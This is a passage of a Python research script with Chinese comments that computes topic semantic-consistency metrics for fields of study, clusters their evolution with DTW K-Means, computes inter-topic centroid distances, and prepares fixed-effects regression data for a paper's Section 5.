vmax=colors.max())\n cb = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),\n ax=ax,\n ticks=colors, fraction=0.027, pad=0.02, shrink=1.0)\n cb.ax.set_yticklabels(labels)\n plt.show()\n\n\ndef results_for_EvolutionTrends():\n \"\"\" Experiments and results in Section 5.2\n Four general evolution patterns of topic consistency are identified based on the K-Means algorithm.\n \"\"\"\n \"\"\" 逐年计算主题的语义一致性指标 \"\"\"\n \n thresh = 100\n sampling_size_1 = 1000\n max_mp_num = 7\n max_sampling_times = 100\n min_sampling_times = 20\n sampling_discount_ratio = 0.5\n \n results_file_path = \"./temp/results_for_evolutionary_trajectory.pkl\"\n random_file_path = \"./temp/results_for_evolutionary_trajectory(random).pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n # (1)计算原指标\n if os.path.exists(results_file_path):\n results = read_file(results_file_path)\n # 检查是否所有主题的指标被全部计算, 否则补算\n for fid in tqdm(FoSs):\n if fid in results:\n continue \n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n (ssim, mer, sdis, freq, time) = calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results[fid] = (ssim, mer, sdis, freq, time)\n save_file(results, results_file_path)\n else:\n # 计算指标\n results = dict()\n for fos in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results[fos] = (ssim, mer, sdis, freq, time)\n save_file(results, results_file_path)\n \n # 计算随机指标 (运算速度慢)\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n # \n if os.path.exists(random_file_path):\n # 检查是否所有主题的指标被全部计算, 否则补算\n results_random = read_file(random_file_path)\n count = 0\n for fid in tqdm(FoSs):\n count += 1\n if fid in results_random:\n continue \n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results_random[fid] = (ssim, mer, sdis, freq, time)\n # 每计算100个主题, 储存/次\n if count >= 100:\n save_file(results_random, random_file_path)\n count = 0\n save_file(results_random, random_file_path)\n else:\n results_random = dict()\n count = 0\n for fos in tqdm(FoSs):\n count += 1\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results_random[fos] = (ssim, mer, sdis, freq, time) \n if count >= 100:\n save_file(results_random, random_file_path)\n count = 0 \n save_file(results_random, random_file_path)\n \n # 读取随机指标\n path_ssim_diff = \"./temp/self_sim_diff_dis.pkl\"\n path_mer_diff = \"./temp/mer_diff_dis.pkl\"\n path_sdis_diff = \"./temp/self_dis_diff_dis.pkl\"\n path_anisotropy_adjusted_res =\"./temp/anisotropy_adjusted_res.pkl\"\n \n ssim_diff = read_file(path_ssim_diff)\n mer_diff = read_file(path_mer_diff)\n sdis_diff = read_file(path_sdis_diff)\n \n # exclude anisotropy\n anisotropy_adjusted_res = dict()\n for fid in tqdm(results):\n ssim, mer, sdis, freq, 
time = results[fid]\n ssim = list(np.array(ssim) - ssim_diff[fid])\n mer = list(np.array(mer) - mer_diff[fid])\n sdis = list(1/np.array(sdis) - 1/sdis_diff[fid])\n anisotropy_adjusted_res[fid] = (ssim, mer, sdis, freq, time)\n save_file(anisotropy_adjusted_res, path_anisotropy_adjusted_res)\n \n \n \"\"\"\n K-Means: 时间序列数据聚类分析\n \"\"\"\n anisotropy_adjusted_res = read_file(path_anisotropy_adjusted_res)\n # 生成tslearn需要的时间序列数据输入, 长度不同的时期序列使用nan补齐\n time_len = 5\n fids = list()\n X_bias = list()\n for fid in anisotropy_adjusted_res:\n ssim, mer, sdis, freq, time = anisotropy_adjusted_res[fid]\n if len(time) >= time_len:\n ts_fid = np.array([ssim, mer, sdis]).T\n fids.append(fid)\n X_bias.append(ts_fid)\n X_bias = tslearn.utils.to_time_series_dataset(X_bias)\n # 标准化处理 - 聚类的目标是识别形状 (compare shapes in an amplitude-invariant manner)\n X_bias = TimeSeriesScalerMeanVariance(mu=0, std=1).fit_transform(X_bias)\n \n # 聚类, dynamic time warping (dtw) - 时间调整对齐距离\n n_clusters = 4\n path_kmeans_res = './temp/TimeSeriesKMeans(km={}).pkl'.format(n_clusters)\n if not os.path.exists(path_kmeans_res):\n km = TimeSeriesKMeans(n_clusters=n_clusters, max_iter=10, metric='dtw', n_jobs=6)\n km.fit(X_bias)\n save_file(km, path_kmeans_res) # 存放模型\n else:\n km = read_file(path_kmeans_res) # 读取模型\n Y_label = km.predict(X_bias)\n # km.transform(X_bias)\n \n # 聚类效果分析 - 质心\n fig = plt.figure(figsize=(8, 8)) # 10, 8\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 15\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n for i in range(n_clusters):\n if n_clusters == 4:\n ax = plt.subplot(2, 2, i+1)\n cluster_type = {0: 0, 1: 3, 2: 2, 3: 1}\n cluster_name = [\"IM\", \"DM\", \"U-shape\", \"Inverted U-shape\"]\n \n if n_clusters == 5:\n ax = plt.subplot(3, 2, i+1)\n cluster_type = {0: 0, 1: 1, 2: 2, 3: 3, 4:4}\n cluster_name = [\"Inverted U-shape\", \"U-shape\", \"IM\", \"DM\", \"IM or Inverted U-shape\"]\n \n if n_clusters == 6:\n ax = plt.subplot(3, 2, i+1)\n cluster_type = {0: 0, 1: 1, 2: 2, 3: 3, 4:4, 5:5}\n cluster_name = [\"DM\", \"U-shape or IM\", \"U-shape\", \"Inverted U-shape\", \"IM\", \"Inverted U-shape\"]\n \n yi = cluster_type[i]\n \n for xx in X_bias[Y_label == yi]:\n ax.plot(np.mean(xx, axis=-1), alpha=.02, c='gray')\n class_num = len(X_bias[Y_label == yi])\n total_num = len(X_bias)\n class_r = class_num / total_num\n \n centroid_yi = km.cluster_centers_[yi]\n # pca = PCA(n_components=1)\n # centroid_yi_ = pca.fit_transform(centroid_yi) # pca可能改变单调性\n \n # 类别的质心\n centroid_yi_mu = np.mean(centroid_yi, axis=-1)\n centroid_yi_mu_smooth = np.convolve(centroid_yi_mu, np.ones(1) / 1,'valid')\n plt.plot(centroid_yi_mu_smooth, c=\"r\", linestyle=\"--\", linewidth=2)\n \n # 二次函数拟合质心\n # popt, r2, y_hat = fit_quadratic_curve(np.arange(len(centroid_yi_mu)), centroid_yi_mu)\n # plt.plot(y_hat, c=\"blue\", linestyle=\"dotted\", linewidth=2)\n \n ax.set_title(cluster_name[i])\n \n plt.text(0.5, 0.5, \"{}\\n{:.2f}%\".format(class_num, 100 * class_r), \n transform=plt.gca().transAxes, color='black', fontsize=20)\n\n plt.ylim(-3, 3)\n plt.xticks(np.arange(0, 35, 5))\n plt.xlim(0, 30)\n plt.xlabel(\"Time\")\n plt.ylabel(r\"$1/3(SSIM+MEV+SDIS)$\")\n plt.tight_layout()\n\n \"\"\"\n Case study 案例分析\n \"\"\"\n fid2AVG = dict() # 三个指标normalized, 然后取平均\n km_results = dict() # \n for yi, xi, fid in zip(Y_label, X_bias, fids):\n fid2AVG[fid] = np.mean(xi, axis=-1)\n if yi not in km_results:\n km_results[yi] = dict()\n 
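# editor's note (added, not in the original): each km_results entry maps a cluster label to its member FoS names under \"samples\" plus the learned DTW centroid under \"cluster_centers_\", as filled in just below.\n 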
km_results[yi][\"samples\"] = list()\n km_results[yi][\"cluster_centers_\"] = km.cluster_centers_[yi]\n km_results[yi][\"samples\"].append(fid)\n \n # 倒U型, 上升类, 下降类, 正U型\n yi = 0\n fos = random.sample(km_results[yi][\"samples\"], 1)[0]\n (ssim, mer, sdis, freq, time) = anisotropy_adjusted_res[fos]\n plot_all_metrics(time, ssim, mer, sdis, freq, fos, [], [], [], fit=True, normalized=False)\n \n \"\"\" \n 可视化分析 \n \"\"\"\n # FoSs = list(anisotropy_adjusted_res.keys())\n # fos = random.sample(FoSs, 1)[0]\n # class_idx = 0\n # fos = random.sample(km_results[class_idx]['samples'], 1)[0]\n fos = \"semantic network.pkl\".lower()\n (ssim, mer, sdis, freq, time) = anisotropy_adjusted_res[fos]\n plot_all_metrics(time, ssim, mer, sdis, freq, fos, fit=True, normalized=False, cls_type='Inverted U-shape') # Inverted U-shape\n plot_3d_func(fos, results, FoS2Vec_path, cls_type='Inverted U-shape')\n \n\n#%%\n\"\"\"\n Experiments and results in Section 5.3\n Calculate others similarity & others distance\n\"\"\"\n\ndef calculate_centriod_dis(Centroid, fos_i, fos_j):\n \"\"\"计算不同fos质心的差距\"\"\"\n tmp = dict()\n Centroid_i = Centroid[fos_i] # 质心i\n Centroid_j = Centroid[fos_j] # 质心j\n start_year_i = min(Centroid_i.keys())\n start_year_j = min(Centroid_j.keys())\n end_year_i = max(Centroid_i.keys())\n end_year_j = max(Centroid_j.keys())\n start_year = max(start_year_i, start_year_j)\n end_year = 2018\n for year in range(start_year, end_year + 1):\n # 计算质心距离\n if year in Centroid[fos_i]:\n vecs_i_avg = Centroid[fos_i][year]\n else:\n vecs_i_avg = Centroid[fos_i][end_year_i]\n if year in Centroid[fos_j]:\n vecs_j_avg = Centroid[fos_j][year]\n else:\n vecs_j_avg = Centroid[fos_j][end_year_j]\n vecs_i_avg = torch.tensor(vecs_i_avg).float()\n vecs_j_avg = torch.tensor(vecs_j_avg).float()\n cos_ij = torch.cosine_similarity(vecs_i_avg, vecs_j_avg).numpy()[0]\n dis_ij = torch.dist(vecs_i_avg, vecs_j_avg).numpy()\n dis_ij = np.array([dis_ij])[0]\n \n cos_ij = np.array(cos_ij, dtype=np.float16)\n dis_ij = np.array(dis_ij, dtype=np.float16)\n tmp[year] = np.array([cos_ij, dis_ij])\n return tmp\n\n\ndef calculate_centriod_dis_MP(Centroid, cofos_list_i):\n tmp2 = dict()\n for name_ij in cofos_list_i:\n fos_i, fos_j = name_ij.split(\";\")\n tmp = calculate_centriod_dis(Centroid, int(fos_i), int(fos_j))\n tmp2[name_ij] = tmp\n return tmp2\n\n\ndef plot_intra_distance(ssim, osim, time, fos, xticks=[], ax1_yticks=[], ax2_yticks=[]):\n \n \"\"\"\n (ssim, time): self distance (inter similarity)\n (osim, time): intra similarity\n \"\"\"\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n Y = [ssim, osim]\n C = [\"red\", \"blue\", \"green\", \"brown\"]\n S = [\"s\", \"o\", \"+\", \"p\"]\n Ylabel = [\"SSIM\", \"OSIM\"] # 类内相似性, 类间相似性\n\n ax1 = fig.add_subplot(111)\n ax1.plot(time, ssim, c='red', linewidth=1, linestyle='--', marker=\"s\", label=\"\")\n ax2 = plt.twinx()\n ax2.plot(time, osim, c='blue', linewidth=1, linestyle='--', marker=\"o\", label=\"\")\n \n ax1.set_ylabel(\"SSIM\", color='red')\n ax2.set_ylabel(\"OSIM\", color='blue')\n ax1.set_xlabel(\"Time\")\n ax1.legend(frameon=False, loc='upper left')\n ax2.legend(frameon=False, loc='upper right')\n plt.title(fos[:-4], fontsize=20, fontweight='bold')\n plt.tight_layout()\n \n # 坐标轴刻度\n ax1.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = 
math.ceil(max(ssim) * 1000)\n down_y = math.floor(min(ssim) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax1.set_yticks(yticks)\n \n ax2.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = math.ceil(max(osim) * 1000)\n down_y = math.floor(min(osim) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax2.set_yticks(yticks)\n \n if min(time) % 10 >= 5:\n down_x = min(time) // 10 * 10 + 5\n else:\n down_x = min(time) // 10 * 10\n up_x = 2025\n xticks = np.arange(down_x, up_x, 5)\n ax1.set_xticks(xticks)\n ax1.tick_params(axis='y',colors='red')\n ax2.tick_params(axis='y',colors='blue')\n\n\ndef results_for_analyze_evolutionary_trajectory_Step2():\n \"\"\"获取fos_i与fos_j之间的距离信息\"\"\"\n \n FoS2Vec_path = os.path.join(abs_file_path, \"FoS2Vec\")\n results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n FoSs = list(results.keys())\n \n # 统一计算质心\n if not os.path.exists(\"./temp/Centroid.pkl\"):\n Centroid = dict()\n for fos in tqdm(FoSs):\n Centroid[fos] = dict()\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n start_year = max(min(dic.keys()), 1990)\n end_year = min(max(dic.keys()), 2018)\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n else:\n vecs_avg = np.mean(vecs, axis=0, keepdims=True)\n if year not in Centroid[fos]:\n Centroid[fos][year] = vecs_avg\n save_file(Centroid, \"./temp/Centroid.pkl\")\n else:\n # 计算 fos_i 和 fos_j 逐年的质心的距离\n Centroid = read_file(\"./temp/Centroid.pkl\")\n \n # 给fos编号, 节约内存\n Centroid_ = dict()\n fos2idx = dict()\n idx2fos = dict()\n for i, fos in enumerate(Centroid):\n fos2idx[fos] = i\n idx2fos[i] = fos\n Centroid_[i] = Centroid[fos]\n del Centroid\n save_file(idx2fos, \"./temp/idx2fos.pkl\")\n save_file(fos2idx, \"./temp/fos2idx.pkl\")\n \n # 统计需要计算的总(fos_i, fos_j) pair\n results_cofos_dis = dict()\n for fos_i in tqdm(FoSs):\n for fos_j in FoSs:\n if fos_i == fos_j:\n continue\n name_ij = str(fos2idx[fos_i]) + \";\" + str(fos2idx[fos_j])\n name_ji = str(fos2idx[fos_j]) + \";\" + str(fos2idx[fos_i])\n if name_ij not in results_cofos_dis and name_ji not in results_cofos_dis:\n results_cofos_dis[name_ij] = dict()\n \n # 将上述总 (fos_j, fos_j) pair 划分成 100 块\n chunck_num = 100\n cofos_list = list(results_cofos_dis.keys())\n del results_cofos_dis\n start_c = 0\n end_c = 0\n c_size = math.ceil(len(cofos_list) / chunck_num)\n for c in tqdm(range(chunck_num)):\n end_c = min(start_c + c_size, len(cofos_list))\n cofos_list_c = cofos_list[start_c: end_c] # 取出一块多进程处理\n save_file(cofos_list_c, os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n start_c = end_c\n del cofos_list\n \n # 每块 (fos_i, fos_j) pair 多进程计算质心距离 (cosine, Euclidean)\n for c in range(chunck_num):\n print(\"Processing {}\".format(c))\n start_time = time_lib.perf_counter()\n \n cofos_list_c = read_file(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n # 开始多进程\n total_size = len(cofos_list_c)\n mp_num = 7\n mp_size = math.ceil(total_size / mp_num)\n start_idx = 0\n end_idx = 0\n tmp3 = list()\n pool = multiprocessing.Pool(processes=mp_num) # 创建进程池\n for i in range(mp_num):\n end_idx = min(start_idx + mp_size, len(cofos_list_c))\n cofos_list_i = cofos_list_c[start_idx: end_idx]\n tmp3.append(pool.apply_async(calculate_centriod_dis_MP, (Centroid_, cofos_list_i,))) \n start_idx = end_idx\n pool.close()\n pool.join()\n # 获取结果\n results_cofos_dis = dict()\n for tmp3_i in tmp3:\n res = tmp3_i.get()\n for name_ij in res:\n 
results_cofos_dis[name_ij] = res[name_ij]\n save_file(results_cofos_dis, os.path.join(abs_file_path, \"FoS2FoS/results_cofos_dis_{}.pkl\".format(c)))\n end_time = time_lib.perf_counter()\n \n print(\"耗时: {}\".format(round(end_time - start_time)))\n \n # 清除中间文件\n for c in tqdm(range(chunck_num)):\n if os.path.exists(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c))):\n os.remove(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n \n # 稀疏矩阵储存 (逐年)\n row_num = len(idx2fos) \n for c in tqdm(range(chunck_num)):\n results_cofos_dis = read_file(os.path.join(abs_file_path, \"FoS2FoS/results_cofos_dis_{}.pkl\".format(c)))\n # 新增信息\n Matrixs = dict()\n for year in range(1990, 2018 + 1):\n Matrix = np.zeros((row_num, row_num), dtype=np.float16)\n Matrixs[year] = Matrix \n for name_ij in tqdm(results_cofos_dis):\n fos_i, fos_j = name_ij.split(\";\")\n fos_i = int(fos_i)\n fos_j = int(fos_j)\n for year in results_cofos_dis[name_ij]:\n Matrix = Matrixs[year]\n cos_ij, dis_ij = results_cofos_dis[name_ij][year] \n # Matrix[fos_i, fos_j] = cos_ij # *** OSIM ***\n Matrix[fos_i, fos_j] = dis_ij # *** ODIS ***\n # 补充\n for year in range(1990, 2018 + 1):\n Current_Matrix = Matrixs[year] # 非稀疏矩阵\n path_SMatrix = os.path.join(abs_file_path, \"FoS2SM/SM_{}.pkl\".format(year))\n if not os.path.exists(path_SMatrix):\n Current_SMatrix = csr_matrix(Current_Matrix) # 转换成稀疏矩阵\n save_file(Current_SMatrix, path_SMatrix)\n else:\n Former_SMatrix = read_file(path_SMatrix)\n Former_Matrix = csr_matrix(Former_SMatrix).toarray()\n Former_Matrix += Current_Matrix\n Former_SMatrix = csr_matrix(Former_Matrix)\n save_file(Former_SMatrix, path_SMatrix)\n \n \n # (2) 研究主题自距离(ssim) 与 主题与其它主题的质心距离\n idx2fos = read_file(\"./temp/idx2fos.pkl\")\n fos2idx = read_file(\"./temp/fos2idx.pkl\")\n results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n ODIS_OSIM = dict()\n for fos in results:\n ODIS_OSIM[fos] = dict() \n for year in tqdm(range(1990, 2018 + 1)):\n Matrix = read_file(os.path.join(abs_file_path, \"FoS2SM/SM_{}.pkl\".format(year)))\n Matrix = csr_matrix(Matrix).toarray() # 是上三角矩阵\n Matrix = Matrix + Matrix.T # 转换成距离对称矩阵 \n for i in range(len(Matrix)): \n fos = idx2fos[i]\n ssim, mer, sdis, freq, time = results[fos]\n fos_beg_year = min(time)\n fos_end_year = max(time)\n if fos_beg_year <= year and year <= fos_end_year:\n Matrix_row_i = Matrix[i]\n denominator = max(np.sum(Matrix_row_i != 0), 1)\n numerator = np.sum(Matrix_row_i)\n cos_avg = numerator / denominator\n ODIS_OSIM[fos][year] = cos_avg\n # save_file(ODIS_OSIM, \"./temp/results_for_evolutionary_trajectory2.pkl\") # osim\n # save_file(ODIS_OSIM, \"./temp/results_for_evolutionary_trajectory3.pkl\") # odis\n \n \n # case study\n results = read_file(\"./temp/anisotropy_adjusted_res.pkl\")\n results2 = read_file(\"./temp/results_for_evolutionary_trajectory2.pkl\") # osim\n results3 = read_file(\"./temp/results_for_evolutionary_trajectory3.pkl\") # odis\n \n fos = list(results.keys())[1001] \n fos = \"semantic network.pkl\"\n ssim, mer, sdis, freq, time = results[fos] \n osim = results2[fos]\n osim = [osim[t] for t in time]\n plot_intra_distance(ssim, osim, time, fos)\n \n\n#%%\n\"\"\"\n Experiments and results in Section 5.3\n Conduct regression analysis with fixed time and entity effects\n\"\"\"\n\ndef calculate_metrics_pearsonr(Matrix, columns_name, title=\"\"):\n ''' 计算上述所有指标的相关系数 '''\n # pd dataframe\n Data = pd.DataFrame(Matrix)\n # Data = (Data - Data.min()) / (Data.max() - Data.min())\n # 计算 pearsonr\n 
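# editor's note (added, not in the original): pandas .corr() computes Pearson correlation by default; the upper triangle is masked below so each coefficient appears once in the heatmap.\n 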
corr_matrix = Data.corr()\n mask = np.triu(np.ones_like(corr_matrix, dtype=np.bool))\n corr = corr_matrix.copy()\n \n # 绘制热力图\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\", # \n \"font.size\" : 12\n }\n rcParams.update(config)\n # SimHei 字体符号不正常显示\n plt.rcParams['axes.unicode_minus'] = False \n \n cmap = sns.diverging_palette(230, 0, 90, 60, as_cmap=True)\n sns.heatmap(corr, mask=mask, annot=True, fmt='.2f', cmap=cmap,\n vmin=-1, vmax=1, cbar_kws={'shrink': 1}, linewidths=5, square=True,\n xticklabels=columns_name, yticklabels=columns_name)\n plt.yticks(rotation=0) \n plt.title(title, fontsize=20)\n\n\ndef calculate_gini(freq_list):\n # 计算GINI-index 2023-4-7\n freq_list = np.array(freq_list)\n freq_ratio = freq_list / max(sum(freq_list), 1)\n gini = 1 - sum(freq_ratio ** 2) # gini系数, 越靠近0, 表示越纯\n return gini\n\n\ndef get_unique_num(aids, time1, time2):\n # 作者数目, 机构数目, 期刊数目 from time1 to time2\n unique_id = dict()\n for year in range(time1, time2 + 1):\n if year in aids:\n for aid in aids[year]:\n if aid not in unique_id:\n unique_id[aid] = 0\n unique_id[aid] += aids[year][aid]\n unique_num = len(unique_id)\n freq_list = [unique_id[Id] for Id in unique_id]\n gini = calculate_gini(freq_list)\n return unique_num, gini\n \n\ndef get_cc_num(ccs, time1, time2):\n # 引用次数\n cc_full_num = 0 \n cc_frac_num = 0\n for year in range(time1, time2 + 1):\n if year in ccs:\n cc_full_num += ccs[year][0]\n cc_frac_num += ccs[year][1]\n return cc_full_num, cc_frac_num\n\n\ndef get_freq_num(fids, time1, time2, fos):\n # 共现次数 (自身频率, 其余主题频率)\n self_freq = 0\n unique_co_fos = dict()\n for year in range(time1, time2 + 1):\n if year in fids:\n for fos_ in fids[year]:\n if fos_ == fos[:-4]:\n self_freq += fids[year][fos_]\n else:\n if fos_ not in unique_co_fos:\n unique_co_fos[fos_] = fids[year][fos_]\n else:\n unique_co_fos[fos_] += fids[year][fos_]\n \n unique_fos_num = len(unique_co_fos.keys()) # 共现主题种类\n other_freq_list = list() # 共现主题频次\n for fos_ in unique_co_fos:\n other_freq_list.append(unique_co_fos[fos_])\n other_freq_sum = sum(other_freq_list)\n gini = calculate_gini(other_freq_list) # gini index \n return self_freq, other_freq_sum, unique_fos_num, gini \n\n\ndef get_inter_metrics(results, time1, time2, fos):\n \"\"\"inter-class\"\"\"\n ssim, mer, sdis, freq, time = results[fos]\n tmp = dict()\n for i, t in enumerate(time):\n tmp[t] = (ssim[i], mer[i], sdis[i])\n \n max_time = time[-1]\n time2_ = min(time2, max_time)\n ssim_t, mer_t, sids_t = tmp[time2_]\n time_gap = time2_ - time[0] + 1\n return ssim_t, mer_t, sids_t, time_gap\n\n\ndef get_intra_metrics(results2, time1, time2, fos): \n \"\"\"intra-class\"\"\"\n max_time = max(results2[fos].keys())\n time2_ = min(time2, max_time)\n osim_t = results2[fos][time2_]\n return osim_t\n \n\ndef results_for_linear_regression_analysis(): \n \"\"\" experiments and results in Section 5.3 \"\"\"\n # 1990-2018年逐年ssim, mer, sdis (Total FoS Freq >= 100)\n path_anisotropy_adjusted_res =\"./temp/anisotropy_adjusted_res.pkl\"\n # results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n results = read_file(path_anisotropy_adjusted_res)\n results2 = read_file(\"./temp/results_for_evolutionary_trajectory2.pkl\") # OSIM\n results3 = read_file(\"./temp/results_for_evolutionary_trajectory3.pkl\") # ODIS\n\n # 准备线性回归数据\n begyear_all = 1990\n endyear_all = 2018\n data = dict()\n for fos in tqdm(results):\n data_fos = list()\n \n # 读取词向量信息\n # vec_path 
= os.path.join(absolute_path, \"FoS2Vec/{}\".format(fos))\n # vecs = read_file(vec_path)\n # 读取作者信息\n aid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Aid\", fos))\n aids = read_file(aid_path)\n # 读取机构信息\n oid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Oid\", fos))\n oids = read_file(oid_path)\n # 读取期刊信息\n vid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Vid\", fos))\n vids = read_file(vid_path)\n # 读取引用信息\n cc_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2CC\", fos))\n if os.path.exists(cc_path):\n ccs = read_file(cc_path)\n else:\n ccs = dict()\n # 读取共现信息 (FoS)\n fid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Fid\", fos))\n fids = read_file(fid_path)\n \n # 确定序列时刻范围:[begyear, endyear] (该时段已计算fos的ssim, mer, sdis指标)\n _, _, _, _, time = results[fos]\n begyear_fos = min(time)\n endyear_fos = max(time)\n begyear = max(begyear_all, begyear_fos) # 保证已计算 ssim, mer, sdis\n endyear = min(endyear_all, endyear_fos) # 保证已计算 ssim, mer, sdis\n for year in range(begyear, endyear + 1):\n # 控制变量\n aids_num, aids_gini = get_unique_num(aids, year, year) # 当年的作者数\n oids_num, oids_gini = get_unique_num(oids, year, year) # 当年的机构数\n vids_num, vids_gini = get_unique_num(vids, year, year) # 当年的期刊数\n cc_full_num, cc_frac_num = get_cc_num(ccs, year, year) # 当年的引用数\n fos_freq, cofos_freq, cofos_num, cofos_gini = get_freq_num(fids, year, year, fos) # 当年的采纳数\n # 因变量 和 自变量\n ssim_t, mer_t, sdis_t, time_gap = get_inter_metrics(results, year, year, fos) # 因变量\n osim_t = get_intra_metrics(results2, year, year, fos) # 自变量 \n odis_t = get_intra_metrics(results3, year, year, fos)\n \n data_fos.append([ssim_t, mer_t, sdis_t, # 因变量\n osim_t, 1 / odis_t, # 自变量\n fos, time_gap, year, # 个体效应, 时间效应 (相对时间, 绝对时间)\n aids_num, oids_num, vids_num, # 控制变量\n aids_gini, oids_gini, vids_gini, # 控制变量 \n fos_freq, cofos_freq, cofos_num, cofos_gini, # 控制变量\n cc_full_num, cc_frac_num]) # 控制变量\n data[fos] = data_fos\n save_file(data, \"./temp/data_reg.pkl\")\n \n \n # (2) 开始线性回归\n data_reg = read_file(\"./temp/data_reg.pkl\")\n # 准备回归数据\n Examples = data_reg\n data = list()\n for fos in Examples:\n data += data_reg[fos]\n data = pd.DataFrame(data)\n data.columns = [\"SSIM\", \"MER\", \"SDIS\",\n \"OSIM\", r\"ODIS\",\n \"FoS\", \"RT\", \"T\",\n \"N_A\", \"N_O\", \"N_J\",\n \"G_A\", \"G_O\", \"G_J\", \n \"Freq\", \"CoFreq\", \"N_Co\", \"G_Co\",\n \"CC_full\", \"CC_frac\"]\n RT = pd.Categorical(data.RT)\n data = data.set_index(['FoS', \"RT\"], drop=True)\n data['RT'] = RT\n data['OSIM2'] = data[\"OSIM\"] ** 2\n data[\"LogFreq\"] = np.log(np.maximum(data[\"Freq\"], 1e-3)) # log 采纳频次 (论文数)\n data[\"LogCC\"] = np.log(np.maximum(data[\"CC_full\"], 1e-3)) # log 被引数\n \n # 线性相关性检查\n columns_name = [r\"$SSIM$\", r\"$MEV$\", r\"$SDIS$\", \n r\"$OSIM$\", r\"$ODIS$\", \n r\"$N^S$\", r\"$N^{AI}$\", r\"$N^{JC}$\",\n r\"$N^{F}$\", r\"$N^{CF}$\", r\"$N^{UCF}}$\",\n r\"$N^{CC}$\",\n r\"$G^{S}$\", r\"$G^{AI}$\", r\"$G^{JC}$\", r\"$G^{CF}$\"]\n data_corr = data[[\"SSIM\", \"MER\", \"SDIS\", \n \"OSIM\", r\"ODIS\",\n \"N_A\", \"N_O\", \"N_J\",\n \"Freq\", \"CoFreq\", \"N_Co\", \n \"CC_full\",\n \"G_A\", \"G_O\", \"G_J\", \"G_Co\"]]\n calculate_metrics_pearsonr(data_corr, columns_name)\n \n # data_corr = data[[\"LogFreq\", \"LogCC\", \"Freq\", \"CC_full\"]]\n # corr_matrix = data_corr.corr()\n # print(corr_matrix)\n # variance_inflation_factor(data_corr.values, 1)\n \n # Table 4\n # 固定效应 - 双向效应\n exog_vars = ['OSIM']\n exog_vars = ['OSIM', \"LogFreq\"]\n 
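# editor's note (added, not in the original): the successive exog_vars assignments here overwrite one another, so only the last specification is fit per run; a hypothetical loop to fit every specification in turn could read: for spec in specs: print(PanelOLS(data.SSIM, sm.add_constant(data[spec]), entity_effects=True, time_effects=True).fit()).\n 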
